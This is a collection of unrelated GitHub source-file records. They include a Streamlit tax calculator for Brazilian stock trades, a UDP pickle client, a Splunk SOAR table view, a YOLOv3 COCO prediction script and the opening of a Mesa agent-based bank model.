+{"seq_id":"21252408842","text":"import pandas as pd\nimport numpy as np\nimport streamlit as st\nimport re\nimport io\nimport datetime\nimport sys\n\nst.set_option('deprecation.showfileUploaderEncoding', False)\n\n\n@st.cache(allow_output_mutation=True)\ndef cleaning(dataset):\n\n dataset.drop([x for x in dataset.columns if x.startswith(\"Unn\")], axis=1 , inplace=True) # drop unnamed columns from the frame passed in (was df_orig, a module-level global)\n\n dataset['Data Negócio'] = pd.to_datetime(dataset['Data Negócio'],dayfirst=True)\n\n def correction(x):\n if \"C\" in x:\n x = \"C\"\n elif 'V' in x:\n x = \"V\"\n return x\n\n\n dataset['C/V']=dataset[\"C/V\"].apply(correction)\n\n def fracionario_to_normal(x):\n if x.endswith(\"F\"):\n x = x[:-1]\n return x\n\n dataset['Código'] = dataset[\"Código\"].apply(fracionario_to_normal)\n dataset.drop(['Mercado', 'Prazo','Especificação do Ativo' ], axis=1, inplace=True)\n\n dataset.to_csv(\"df.csv\")\n\n #return dataset\n\n\ndef check_consistency():\n\n df = pd.read_csv(\"df.csv\", index_col=0)\n df['Data Negócio'] = pd.to_datetime(df['Data Negócio'], dayfirst=True)\n \n status = False # default: no inconsistency found (prevents a NameError when no ticker triggers a check)\n\n fail = {'ticker':'', 'date':'', \"index\":'' , 'reason':''}\n for ticker in df[\"Código\"].unique():\n\n if len(df[(df[\"C/V\"] == \"V\") & (df[\"Código\"] == ticker)].values) > 0:\n\t#check to ensure the sell date comes after a purchase date. It guarantees that we have a mean price to calculate the profit.\n \n first_sell_index = df[(df[\"C/V\"] == \"V\") & (df[\"Código\"] == ticker)]['Data Negócio'].index[0]\n first_sell_date = df.iloc[first_sell_index]['Data Negócio']\n total_sold = df[(df[\"C/V\"] == \"V\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n total_purchased = df[(df[\"C/V\"] == \"C\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n\n \n\t#check that the sold ticker has a purchase price. It is needed to calculate the mean price of the ticker and then the profit.\n if len(df.iloc[:first_sell_index][(df[\"C/V\"] == \"C\") & (df[\"Código\"] == ticker)]['Data Negócio']) == 0:\n fail['ticker'] = ticker\n fail['index'] = first_sell_index\n fail['date'] = first_sell_date\n fail['reason'] = 'before'\n status = True\n break\n #check if there are more sold stocks than the purchased ones.\n elif total_sold>total_purchased:\n fail['ticker'] = ticker\n fail['index'] = first_sell_index\n fail['date'] = first_sell_date\n fail['reason'] = 'less'\n status = True\n break\n \n else:\n status = False \n \n return status, fail\n\n
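A toy illustration of the first check in `check_consistency` — a sale with no earlier purchase — on a hand-made frame (hypothetical data, same column names):

```python
import pandas as pd

df = pd.DataFrame({
    "Data Negócio": pd.to_datetime(["2020-01-10", "2020-01-20"]),
    "C/V": ["V", "C"],  # the sale of PETR4 comes before any purchase
    "Código": ["PETR4", "PETR4"],
    "Quantidade": [100, 100],
})

ticker = "PETR4"
sells = df[(df["C/V"] == "V") & (df["Código"] == ticker)]
first_sell_index = sells.index[0]
prior = df.iloc[:first_sell_index]
prior_buys = prior[(prior["C/V"] == "C") & (prior["Código"] == ticker)]
print(len(prior_buys) == 0)  # True -> inconsistent: no purchase before the first sale
```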
def add(fail):\n df = pd.read_csv(\"df.csv\", index_col=0)\n df['Data Negócio'] = pd.to_datetime(df['Data Negócio'], dayfirst=True)\n\n \n ticker, first_sell_date, first_sell_index, reason = fail.values()\n\n if reason == 'before': \n st.subheader('AVISO')\n st.markdown(f'''No arquivo tem informação sobre a venda da ação **{ticker}** na data **{first_sell_date.date()}** \n mas está faltando informação sobre a sua compra nos dias anteriores''')\n\n data_compra = st.date_input(f\"A data da compra da ação {ticker}\", value = first_sell_date- datetime.timedelta(days=1), max_value=first_sell_date)\n data_compra = pd.to_datetime(data_compra)\n quantidade_compra = st.number_input(\"Quantidade\", min_value=df.iloc[first_sell_index]['Quantidade'])\n preço_compra = st.number_input(label=\"Preço\", min_value = 0.)\n\n if st.button(label=\"Click 2X\", key=1):\n # insert the new purchase row at first_sell_index by splitting and re-concatenating the frame\n line = pd.DataFrame({'Data Negócio':data_compra, 'C/V':\"C\", 'Código':ticker, 'Quantidade':quantidade_compra\n , 'Preço (R$)': preço_compra, 'Valor Total (R$)': preço_compra*quantidade_compra}, index = [first_sell_index])\n df = pd.concat([df.iloc[:first_sell_index], line, df.iloc[first_sell_index:]]).reset_index(drop=True)\n df.sort_index(inplace=True)\n df.to_csv(\"df.csv\")\n\n if reason == 'less':\n total_sold = df[(df[\"C/V\"] == \"V\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n total_purchased = df[(df[\"C/V\"] == \"C\") & (df[\"Código\"]==ticker)]['Quantidade'].sum()\n different = total_sold - total_purchased\n st.subheader('AVISO')\n st.markdown(f\"No arquivo tem mais {different} venda da ação {ticker} do que compra. Por favor informa a data e o preço da compra.\")\n \n data_compra = st.date_input(f\"A data da compra da ação {ticker}\", value = first_sell_date- datetime.timedelta(days=1))\n data_compra = pd.to_datetime(data_compra)\n quantidade_compra = st.number_input(\"Quantidade\", min_value=different)\n preço_compra = st.number_input(label=\"Preço\", min_value = 0.)\n\n if st.button(label=\"Enter 2X \", key=2):\n line = pd.DataFrame({'Data Negócio':data_compra, 'C/V':\"C\", 'Código':ticker, 'Quantidade':quantidade_compra\n , 'Preço (R$)': preço_compra, 'Valor Total (R$)': preço_compra*quantidade_compra}, index = [first_sell_index])\n df = pd.concat([df.iloc[:first_sell_index], line, df.iloc[first_sell_index:]]).reset_index(drop=True)\n df.sort_index(inplace=True)\n df.to_csv(\"df.csv\")\n\n \n \n #raise st.ScriptRunner.StopException\n\n
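`add` splices the user-supplied purchase row in at `first_sell_index` via the slice-and-concat idiom; the idiom in isolation, on a hypothetical toy frame:

```python
import pandas as pd

df = pd.DataFrame({"Código": ["PETR4", "PETR4"], "Quantidade": [100, 50]})
new_row = pd.DataFrame({"Código": ["PETR4"], "Quantidade": [70]})

insert_at = 1  # positional index the new row should occupy
df = pd.concat([df.iloc[:insert_at], new_row, df.iloc[insert_at:]]).reset_index(drop=True)
print(df["Quantidade"].tolist())  # [100, 70, 50]
```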
@st.cache\ndef general_view():\n df = pd.read_csv(\"df.csv\", index_col=0)\n df['Data Negócio'] = pd.to_datetime(df['Data Negócio'],dayfirst=True)\n df.sort_index(inplace=True)\n\n #df=df1.copy()\n\n #finding the DT-trade operations\n DT_trade = {\"date\":[], \"ticker\":[], 'index':[]}\n\n dates = df[\"Data Negócio\"].unique()\n\n for date in dates:\n tickers = df[df[\"Data Negócio\"]==date]['Código'].unique()\n for ticker in tickers:\n if all(x in df[(df[\"Data Negócio\"]==date) & (df[\"Código\"]==ticker)][\"C/V\"].values for x in [\"C\",\"V\"]):\n DT_trade['index'].append(df[(df[\"Data Negócio\"]==date) & (df[\"Código\"]==ticker)][\"C/V\"].index)\n DT_trade['date'].append(date)\n DT_trade['ticker'].append(ticker)\n\n DT_trade[\"index\"] = [item for sublist in DT_trade['index'] for item in sublist]\n\n #creating a new column to mark the ST/DT trades\n\n df['DT/ST'] = \"ST\"\n\n df.at[DT_trade['index'], 'DT/ST'] = 'DT'\n\n #Calculating the operational costs of the operations.\n #the Valor for the purchased stocks turns negative because we lose money!\n df[\"Valor Total (R$)\"] = np.where(df[\"C/V\"] == \"C\", -1* df[\"Valor Total (R$)\"], df[\"Valor Total (R$)\"])\n\n # the below costs are strange! I haven't found them on Clear's website\n #df['Custo de Operação-ST'] = np.where(df[\"C/V\"] == \"V\", -1*df['Valor Total (R$)'] * (0.000325 + 0.00005),df['Valor Total (R$)'] * (0.000325))\n\n df['Custos-ST'] = -1*abs(df['Valor Total (R$)'] * (0.000275 + 0.00005))\n df['Custos-ST'] = round(df['Custos-ST'],3)\n\n df['Custos-DT'] = 0.\n\n #calculating how the stocks in a DT-trade are divided between ST-trade and DT-trade\n df['Quant-DT'] = 0\n df['Quant-ST'] = df[\"Quantidade\"]\n df['Lucro-DT'] = 0. \n df['Lucro-ST'] = 0. \n\n for DT in DT_trade['date']:\n for ticker in df[(df[\"Data Negócio\"]==DT)&(df['DT/ST'] == \"DT\")][\"Código\"].unique() :\n dt = df[(df[\"Data Negócio\"]==DT) & (df[\"Código\"]==ticker)]\n sell_list = []\n purchase_list = []\n for index,row in dt.iterrows():\n if row['C/V'] == 'V':\n sell_list.append(index)\n if row['C/V'] == 'C':\n purchase_list.append(index)\n \n for s_index, p_index in zip(sell_list,purchase_list):\n sell_quantity = df.iloc[s_index][\"Quantidade\"]\n purchase_quantity = df.iloc[p_index][\"Quantidade\"]\n sell_price = df.iloc[s_index][\"Preço (R$)\"]\n purchase_price = df.iloc[p_index][\"Preço (R$)\"]\n dt_quantity = min(sell_quantity, purchase_quantity)\n st_quantity = max(sell_quantity, purchase_quantity) - dt_quantity\n dt_operation_cost = dt_quantity*(sell_price + purchase_price) * (0.0002 + 0.00005)\n \n df.at[p_index, 'Custos-DT'] = -1*abs(dt_quantity*(purchase_price) * (0.0002 + 0.00005))\n df.at[s_index, 'Custos-DT'] = -1*abs(dt_quantity*(sell_price) * (0.0002 + 0.00005))\n\n df.at[s_index,'Quant-DT'] = dt_quantity\n df.at[s_index,'Quant-ST'] = df.iloc[s_index][\"Quantidade\"] - dt_quantity\n\n #As some part of the negotiation might be an ST trade\n df.at[p_index, 'Custos-ST'] = -1*abs(st_quantity*(purchase_price) * (0.000275 + 0.00005))\n df.at[s_index, 'Custos-ST'] = -1*abs(st_quantity*(sell_price) * (0.000275 + 0.00005))\n\n df.at[p_index, 'Quant-DT'] = dt_quantity\n df.at[p_index, 'Quant-ST'] = df.iloc[p_index][\"Quantidade\"] - dt_quantity\n df.at[s_index, 'Lucro-DT'] = dt_quantity * (sell_price - purchase_price) - dt_operation_cost\n\n #correcting \"DT\" to \"ST\"\n s = [x[0] for x in zip(sell_list,purchase_list)] \n s2 = [x for x in sell_list if x not in s]\n df.at[s2, 'DT/ST'] = \"ST\"\n\n p = [x[1] for x in zip(sell_list,purchase_list)] \n p2 = [x for x in purchase_list if x not in p]\n df.at[p2, 'DT/ST'] = \"ST\"\n \n\n #calculating the mean cost of a purchased stock and its evolution with each new acquisition for ST trade. 
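The loop that follows maintains the running average purchase price (preço médio); the update itself, factored out as a standalone sketch (names are illustrative, same formula as the PM column below):

```python
def update_mean_price(prev_mean, prev_position, qty, price, costs):
    """New average cost after buying qty shares at price, with operating costs.

    costs enters with a minus sign because, as in the app, it is stored negative.
    """
    return (prev_mean * prev_position + qty * price - costs) / (prev_position + qty)

# 100 shares at 10.00 with 0.50 total fees, then 50 more at 13.00 with 0.30 fees
pm = update_mean_price(0.0, 0, 100, 10.0, -0.50)   # 10.005
pm = update_mean_price(pm, 100, 50, 13.0, -0.30)   # (1000.5 + 650.3) / 150
print(round(pm, 3))  # 11.005
```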
\n tickers = df[\"Código\"].unique() \n # for calculating the mean cost we need to follow the positions of each ticker in each operation.\n # If position==0 the mean cost resets to the first purchase's price.\n df[\"Posição\"] = 0\n for ticker in tickers:\n position = 0\n for index, row in df[(df[\"Código\"] == ticker)].iterrows():\n if row['Quant-DT'] == 0 or row['Quant-ST'] != 0:\n try: \n if row['C/V'] == 'C':\n position = position + row['Quant-ST']\n df.at[index,\"Posição\"] = position \n \n\n elif row['C/V'] == 'V':\n position = position - row['Quant-ST']\n df.at[index,\"Posição\"] = position\n \n\n except Exception:\n st.write(f\"Erro no calculo de posição da ação {ticker} na data {row['Data Negócio']}\")\n \n \n #using df['Posição'] it is possible to calculate the mean cost.\n df[\"PM\"] = 0.\n for ticker in tickers:\n position_prev = 0\n mean_prev = 0\n #calculating the mean cost (custo médio) for ST-trade operations \n for index, row in df[(df[\"Código\"] == ticker)].iterrows():\n if row['Quant-ST'] != 0:\n \n try:\n if row['C/V']=='C':\n if position_prev == 0:\n medio = (row['Quant-ST']*row['Preço (R$)'] -row['Custos-ST'])/row['Quant-ST']\n df.at[index,\"PM\"] = medio\n mean_prev = medio\n position_prev = row['Posição']\n else:\n \n medio = (mean_prev*position_prev + row['Quant-ST']*row['Preço (R$)'] -row['Custos-ST'])/\\\n (row['Quant-ST'] + position_prev)\n df.at[index,\"PM\"] = medio\n mean_prev = medio\n position_prev = row['Posição']\n\n if row['C/V']=='V':\n #mean_prev = row[\"PM\"]\n position_prev = row['Posição']\n \n\n\n except Exception:\n st.write(f\"Erro no calculo do custo medio no {ticker} na data {row['Data Negócio']}, error{sys.exc_info()}\")\n st.write(row['Quant-ST'], position_prev)\n\n \n #calculating the profit of each sell\n\n #for ST-trade\n for ticker in tickers:\n for index, row in df[(df[\"Código\"] == ticker)].iterrows():\n if row['Quant-ST'] != 0:\n if row[\"C/V\"] == 'C':\n mean_cost = row['PM']\n elif row[\"C/V\"] == 'V':\n gain = row['Quant-ST']*row['Preço (R$)'] + row[\"Custos-ST\"]\n costs = row['Quant-ST']*mean_cost #mean_cost per share already includes the operating costs paid to purchase the stock\n net_gain = round(gain - costs,3)\n df.at[index, 'Lucro-ST'] = net_gain\n \n\n return df\n\n\ndef DT_trade_imposto(df):\n\n df = df[df[\"DT/ST\"]==\"DT\"].copy()\n for index in df.index:\n df.at[index, \"DARF\"] = df.loc[index][\"Lucro-DT\"]* 0.20\n \n df_group = df[['Data Negócio', 'C/V', 'Código', 'Quantidade', \n 'Valor Total (R$)', 'Lucro-ST', 'Lucro-DT',\"DT/ST\", \"DARF\"]].groupby(['Data Negócio', \"Código\", \"C/V\"]).sum()\n\n imposto_DT = df_group['DARF'].sum()\n\n st.subheader(\"DT-Trade\")\n\n st.write(f\"O total imposto devido em relação as operações DT-trade no periodo escolhido é {round(imposto_DT,2)}\")\n\n return df_group[df_group['DARF']!=0]\n\n\ndef ST_trade_imposto(df):\n\n df = df[df[\"DT/ST\"]==\"ST\"].copy()\n \n for y in df[\"Data Negócio\"].dt.year.unique():\n for m in df[df[\"Data Negócio\"].dt.year ==y][\"Data Negócio\"].dt.month.unique():\n venda_mes = df[(df[\"C/V\"]==\"V\") & (df[\"Data Negócio\"].dt.month ==m) & (df[\"Data Negócio\"].dt.year ==y)]['Valor Total (R$)'].sum()\n count = 0\n if venda_mes >= 20000:\n count = 1\n for index in df[(df[\"C/V\"] == 'V') & (df[\"Data Negócio\"].dt.month == m) & (df[\"Data Negócio\"].dt.year == y)].index:\n df.at[index, \"DARF\"] = df.loc[index][\"Lucro-ST\"]* 0.15\n\n\n valor = df[(df[\"C/V\"] == 'V') & (df[\"Data Negócio\"].dt.month == m) & (df[\"Data Negócio\"].dt.year == y)][\"DARF\"].sum()\n st.subheader(\"ST-Trade\")\n 
st.write(f\"O total imposto devido em relação as operações ST-trade no mes {m} do ano {y} escolhido é {round(valor,2)}R$\")\n \n \n if count == 0:\n st.write(\"Não há nenhuma tributação devido as operações ST-trade no intervalo escolhido.\")\n \n df_group = df[['Data Negócio', 'C/V', 'Código', 'Quantidade', \n'Valor Total (R$)','Lucro-ST', 'Lucro-DT', 'DT/ST', \"DARF\"]].groupby(['Data Negócio', \"Código\", \"C/V\"]).sum()\n \n \n return df_group[df_group['DARF']!=0]\n\n\ndef impostos(dataset,year ='todos',month='todos',DT='todos',modalidade='todos'):\n\n if modalidade == \"todos\":\n df = dataset.copy()\n elif modalidade =='DT':\n df = dataset[dataset['DT/ST']==\"DT\"].copy()\n elif modalidade == 'ST':\n df = dataset[dataset['DT/ST']==\"ST\"].copy()\n else:\n print(\"Erro de modalidade\")\n\n \n if year != 'todos' and month != 'todos' and DT != 'todos':\n df_new = df[(df[\"Data Negócio\"].dt.year == year) & (df[\"Data Negócio\"].dt.month == month) & (df[\"Data Negócio\"].dt.DT == DT)].copy()\n elif year != 'todos' and month != 'todos':\n df_new = df[(df[\"Data Negócio\"].dt.year == year) & (df[\"Data Negócio\"].dt.month == month)].copy()\n elif year != 'todos':\n df_new = df[(df[\"Data Negócio\"].dt.year == year)].copy()\n else:\n df_new = df.copy()\n\n #creating a new column for DARF (tax)\n df_new[\"DARF\"] = 0.\n\n #Calculating the tax for the DT-trades\n if modalidade == 'DT':\n df_group = DT_trade_imposto(df_new)\n df_group[\"DT/ST\"] = \"DT\"\n\n #Calculating the tax for the ST-trades\n if modalidade == 'ST':\n df_group = ST_trade_imposto(df_new)\n df_group[\"DT/ST\"] = \"ST\"\n\n #calculating the tax for both types\n if modalidade =='todos':\n df_group1 = DT_trade_imposto(df_new)\n df_group1[\"DT/ST\"] = \"DT\"\n\n df_group2 = ST_trade_imposto(df_new)\n df_group2[\"DT/ST\"] = \"ST\"\n\n df_group = pd.concat([df_group1,df_group2])\n\n return df_group\n\n\n\n\n#Initialization\nst.title(\"Análise Tributária do Aviso de Negociação de Ativos (ANA)\")\nst.markdown(\"O ANA é um documento emitido por B3 que resume todas as operações no mercado de ações Brasileiro. Esse documento se encontra no [https://cei.b3.com.br](https://cei.b3.com.br), no menu **Extratos e Informativos** -> **Negociação de ativos**. É um arquivo de Excel com nome InfoCEI.xls. 
É crucial que o arquivo ANA contenha todas as operações pois os preços das compras são necessários para calcular o custo medio de cada ação, ou seja, no arquivo tem que ter no minimo uma compra para cada ação antes da sua venda.\")\n\n#file_buffer = None\nfile_buffer = st.file_uploader(\"Upload o ANA\", type=[\"xls\"])\n#text_io = io.TextIOWrapper(file_buffer, encoding='utf-8')\n\nif file_buffer:\n df_orig = pd.read_excel(file_buffer, skiprows=10, skipfooter=4)\n\n cleaning(df_orig)\n\n status, fail = check_consistency()\n #st.write(status, fail)\n if status:\n #st.write(\"Add function trigged\")\n add(fail)\n else: \n #st.write(\"General View launched\")\n df = general_view()\n #configuration od sidebar\n years = df[\"Data Negócio\"].dt.year.unique().tolist()\n months = df[\"Data Negócio\"].dt.month.unique().tolist()\n days = np.sort(df[\"Data Negócio\"].dt.day.unique()).tolist()\n\n month_convert= {1: \"Janeiro\", 2:\"Fevereiro\", 3:\"Março\", 4:'April', 5: 'Maio', 6:\"Junho\", 7:'Julho', 8:\"Agosto\",\n 9: \"Setembro\", 10: \"Outubro\", 11:\"Novembro\", 12:'Dezembro'}\n\n months = [month_convert[i] for i in months]\n\n years.insert(0,'todos')\n months.insert(0, 'todos')\n days.insert(0, 'todos')\n\n st.sidebar.header(\"Configurar a Data\")\n\n year = st.sidebar.selectbox(\n \"Escolhe o ano\",years)\n\n month = st.sidebar.selectbox(\n \"Escolhe o mes\", months)\n if month != 'todos':\n month = [i for i in month_convert.keys() if month_convert[i]==month][0]\n\n DT = st.sidebar.selectbox(\n \"Escolhe o dia\",days)\n\n modalidade = st.sidebar.selectbox(\n \"Escolhe a modalidade (DT-trade e/ou ST-trade)\",\n ('todos', 'ST', 'DT'))\n\n st.header(\"Uma Visão Geral das Operações\")\n\n #main part\n\n #df = general_view(df_check)\n #st.dataframe(df, width=1024)\n df_show = df.copy()\n df_show['Data Negócio'] = df_show['Data Negócio'].dt.date\n st.dataframe(df_show.style.set_precision(2))\n\n st.header(\"Os Impostos\")\n\n #impostos(df, year= year, month=month, DT=DT, modalidade=modalidade)\n st.dataframe(impostos(df, year= year, month=month, DT=DT, modalidade=modalidade))\n\n st.markdown('O script desse App se encontra no Github [ibovespa-imposto](https://github.com/vnikoofard/ibovespa-imposto)')\n","repo_name":"vnikoofard/ibovespa-imposto","sub_path":"ibovespa_imposto.py","file_name":"ibovespa_imposto.py","file_ext":"py","file_size_in_byte":19072,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36648102097","text":"import pickle\nimport socket\nimport time\n\nhost = '192.168.1.15'\nfirstport = 12345\nclientSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nclientSock.settimeout(1)\n\ndef sendAndRecp(message):\n start = time.time()\n clientSock.connect_ex((host, firstport))\n clientSock.sendto(pickle.dumps(message), (host, firstport))\n try:\n data, serveur = clientSock.recvfrom(2048)\n dataUncode = pickle.loads(data)\n elapsed = time.time() - start\n\n\n if __name__ == '__main__':\n print('serveur says:' + str(dataUncode) + ' in ' + str(elapsed) + 'ms')\n return dataUncode\n except TimeoutError:\n print('REQUEST TIMED OUT')\n\nif __name__ == '__main__':\n sendAndRecp([4,9,12])\n","repo_name":"yohemm/grab-the-player","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38383886417","text":"import json\n\nfrom django.http import HttpResponse\n\n\ndef display_query_results(provides, 
all_results, context):\n\n headers = []\n\n headers_set = set()\n for summary, action_results in all_results:\n for result in action_results:\n header_data = result.get_data()\n\n if header_data:\n headers += list(header_data[0].keys())\n\n if not headers_set:\n headers_set.update(headers)\n headers = sorted(headers_set)\n\n context['ajax'] = True\n if 'start' not in context['QS']:\n context['headers'] = headers\n return '/widgets/generic_table.html'\n\n adjusted_names = {}\n\n start = int(context['QS']['start'][0])\n length = int(context['QS'].get('length', ['5'])[0])\n end = start + length\n cur_pos = 0\n rows = []\n total = 0\n for summary, action_results in all_results:\n for result in action_results:\n data = result.get_data()\n total += len(data)\n for item in data:\n cur_pos += 1\n if (cur_pos - 1) < start:\n continue\n if (cur_pos - 1) >= end:\n break\n row = []\n\n for h in headers:\n row.append({ 'value': item.get(adjusted_names.get(h, h)) })\n rows.append(row)\n\n content = {\n \"data\": rows,\n \"recordsTotal\": total,\n \"recordsFiltered\": total,\n }\n\n return HttpResponse(json.dumps(content), content_type='text/javascript') # nosemgrep\n","repo_name":"splunk-soar-connectors/sqlite","sub_path":"sqlite_view.py","file_name":"sqlite_view.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35422839373","text":"from src.products import download_store_data, load_slugs_dict\n\n\ndef main():\n num_queries = download_store_data(\n use_preset_operation=False, include_dlc=False, verbose=True\n )\n slugs_dict = load_slugs_dict(num_chunks=num_queries)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"woctezuma/epic-games-ratings","sub_path":"download_store_products.py","file_name":"download_store_products.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29325529359","text":"ingreso= int(input(\"Ingrese sus ingresos en pesos\"))\nanio= int(input(\"Ingrese su año de nacimiento\"))\nedad= 2020-int(anio)\nnumeroh=int(input(\"Ingrese su numero de hijos\"))\naniosp= int(input(\"Ingrese años que pertenece a nuestro banco\"))\nestado=str(input(\"Estado civil s)soltero, c)casado\")) \nvive=str(input(\"Vive en u)urbano, r)rural\"))\ncredito=\"RECHAZADO\"\nif aniosp>10 and numeroh>=2:\n credito=\"APROBADO\"\n \nif estado==\"c\" or estado==\"C\" and numeroh >3 and edad>45 and edad<55 :\n credito=\"APROBADO\"\n \nif ingreso>2500000 and estado==\"s\" or estado==\"S\" and vive==\"u\" or vive==\"U\":\n credito=\"APROBADO\"\n \nif ingreso>3500000 and aniosp>5:\n credito=\"APROBADO\"\n \nif vive==\"r\" or vive==\"R\" and estado==\"c\" or estado==\"C\" and numeroh <2:\n credito=\"APROBADO\"\n \nprint (credito)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_0a13ad6321829ba303c05cb365277a02.py","file_name":"hito1_ej3_0a13ad6321829ba303c05cb365277a02.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38995761933","text":"#! 
/usr/bin/env python\n# coding=utf-8\n\n\nimport sys\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\nfrom PIL import Image\nfrom core import utils, yolov3\nfrom core.dataset import dataset, Parser\n\ncoco_ids = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32,\n 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58,\n 59, 60, 61, 62, 63, 64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88,\n 89, 90]\n\nsess = tf.Session()\n\n\nIMAGE_H, IMAGE_W = 416, 416\nCLASSES = utils.read_coco_names('./data/coco.names')\nNUM_CLASSES = len(CLASSES)\nANCHORS = utils.get_anchors('./data/coco_anchors.txt', IMAGE_H, IMAGE_W)\nCKPT_FILE = \"/home/common/pretrained_models/checkpoint/yolov3.ckpt\"\nIOU_THRESH = 0.5\nSCORE_THRESH = 0.001\n\nall_detections = []\nall_annotations = []\nall_aver_precs = {CLASSES[i]:0. for i in range(NUM_CLASSES)}\n\ntest_tfrecord = \"/home/common/datasets/tfrecords/5k.tfrecords\"\nparser = Parser(IMAGE_H, IMAGE_W, ANCHORS, NUM_CLASSES)\ntestset = dataset(parser, test_tfrecord , batch_size=1, shuffle=None, repeat=False)\n\n\nimages_tensor, *y_true_tensor = testset.get_next()\nmodel = yolov3.yolov3(NUM_CLASSES, ANCHORS)\nwith tf.variable_scope('yolov3'):\n pred_feature_map = model.forward(images_tensor, is_training=False)\n y_pred_tensor = model.predict(pred_feature_map)\n\nsaver = tf.train.Saver()\nsaver = tf.train.import_meta_graph('/home/common/pretrained_models/checkpoint/yolov3.ckpt.meta')\nsaver.restore(sess, CKPT_FILE)\ndt_result_path = \"results/pt_cocoapi.json\"\nimglist_path = \"data/4954.txt\"\nimage_bbox_path=\"bbox/\"\n# total_img_num=5000\nif os.path.exists(dt_result_path):\n os.remove(dt_result_path)\n\nlabels = utils.read_coco_names('./data/coco.names')\n\nwith open(imglist_path) as f:\n total_img_list = f.readlines()\n total_img_list = [x.strip() for x in total_img_list]\n total_img_num = len(total_img_list)\n\nwith open(dt_result_path, \"a\") as new_p:\n image_idx = 0\n new_p.write(\"[\")\n\n for image_path in total_img_list:\n\n if (os.path.exists(image_path)):\n print(image_idx, image_path)\n\n orig_index = int(image_path[50:56])\n img = Image.open(image_path)\n img = img.convert('RGB')\n orig_width, orig_height = img.size\n\n y_pred, y_true, image = sess.run([y_pred_tensor, y_true_tensor, images_tensor])\n pred_boxes = y_pred[0][0]\n pred_confs = y_pred[1][0]\n pred_probs = y_pred[2][0]\n image = Image.fromarray(np.uint8(image[0]*255))\n\n boxes, scores, classes = utils.cpu_nms(pred_boxes, pred_confs*pred_probs, NUM_CLASSES,\n score_thresh=SCORE_THRESH, iou_thresh=IOU_THRESH)\n classes = [] if classes is None else classes.tolist()\n # print(\"pred_labels_list\",pred_labels_list)\n\n # image_bbox = utils.draw_boxes(img, boxes, scores, classes, labels, [IMAGE_H, IMAGE_W], is_show=False)\n # image_bbox.save(image_bbox_path+str(orig_index)+'.jpg')\n\n for j in range(len(classes)):\n coco_id = coco_ids[int(classes[j])]\n left,top ,right,bottom = boxes[j]\n\n left = max(left, 0)\n top = max(top, 0)\n right = min(right, 416)\n bottom = min(bottom, 416)\n\n left = round(left * orig_width / 416, 4)\n top = round(top * orig_height / 416, 4)\n right = right * orig_width / 416\n bottom = bottom * orig_height / 416\n\n width = round(right - left, 4)\n height = round(bottom - top, 4)\n\n\n if image_idx == (total_img_num - 1) and j == (len(classes) - 1):\n new_p.write(\n \"{\\\"image_id\\\":\" + str(orig_index) + \", 
\\\"category_id\\\":\" + str(coco_id) + \", \\\"bbox\\\":[\" + \\\n str(left) + \", \" + str(top) + \", \" + str(width) + \", \" + str(height) + \"], \\\"score\\\":\" + str(\n scores[j]) + \"}\")\n else:\n # print(\"corrected left, top, width, height\", left, top, width, height)\n new_p.write(\n \"{\\\"image_id\\\":\" + str(orig_index) + \", \\\"category_id\\\":\" + str(coco_id) + \", \\\"bbox\\\":[\" + \\\n str(left) + \", \" + str(top) + \", \" + str(width) + \", \" + str(height) + \"], \\\"score\\\":\" + str(\n scores[j]) + \"},\\n\")\n image_idx += 1\n new_p.write(\"]\")\n\n\n\n\n\n\n","repo_name":"HulkMaker/tensorflow-slim-yolov3","sub_path":"coco_predict_gpu.py","file_name":"coco_predict_gpu.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"72757174329","text":"\"\"\"\nThe following code was adapted from the Bank Reserves model included in Netlogo\nModel information can be found at: http://ccl.northwestern.edu/netlogo/models/BankReserves\nAccessed on: November 2, 2017\nAuthor of NetLogo code:\n Wilensky, U. (1998). NetLogo Bank Reserves model.\n http://ccl.northwestern.edu/netlogo/models/BankReserves.\n Center for Connected Learning and Computer-Based Modeling,\n Northwestern University, Evanston, IL.\n\"\"\"\n\nimport mesa\nimport numpy as np\n\nfrom bank_asset.agents import Bank, Firm\n\n\"\"\"\nIf you want to perform a parameter sweep, call batch_run.py instead of run.py.\nFor details see batch_run.py in the same directory as run.py.\n\"\"\"\n\n# Start of datacollector functions\n\n\ndef get_num_big_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_big()]\n return len(rich_agents)\n\ndef get_num_op_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_operating()]\n return len(rich_agents)\n\ndef get_num_n_op_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_not_operating()]\n return len(rich_agents)\n\ndef get_num_bankrupt_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_bankrupt()]\n return len(rich_agents)\n\ndef get_num_non_big_agents(model):\n \"\"\"return number of rich agents\"\"\"\n rich_agents = [a for a in model.schedule.agents if a.is_not_big()]\n return 